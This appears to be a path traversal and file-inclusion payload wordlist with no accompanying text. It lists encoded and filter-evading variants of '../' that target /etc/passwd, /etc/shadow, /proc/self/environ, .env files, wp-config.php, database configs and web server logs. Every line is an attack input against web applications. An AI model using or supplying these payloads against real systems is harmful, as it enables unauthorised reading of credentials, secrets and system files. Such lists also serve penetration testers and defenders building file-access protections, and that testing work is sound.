../../../etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
....//....//....//etc/passwd
..%252F..%252F..%252Fetc%252Fpasswd
../../../proc/cpuinfo
..//..//..//etc/passwd
../../../../../../etc/passwd
..\..\..\..\..\..\windows\win.ini
..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
....\/....\/....\/windows/win.ini
../../../package.json
../../package.json
../package.json
package.json
../../../README.md
../../README.md
../README.md
README.md
../../../vercel.json
../../vercel.json
../vercel.json
vercel.json
../../../proc/self/environ
../../../.env
../../.env
../.env
.env
../../../.env.local
../../.env.local
../.env.local
.env.local
/etc/passwd
/etc/shadow
/etc/hosts
../../../proc/cpuinfo
/proc/self/environ
/proc/version
/windows/system32/drivers/etc/hosts
c:\windows\system32\drivers\etc\hosts
c:/windows/system32/drivers/etc/hosts
/var/www/html/index.php
/var/log/apache2/access.log
/var/log/apache2/error.log
../../../app/config/database.yml
../../../config/database.php
../../../wp-config.php
../../wp-config.php
../wp-config.php
../../../proc/version
wp-config.php
/etc/mysql/my.cnf
/etc/httpd/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/etc/apache2/apache2.conf
../../../etc/hosts
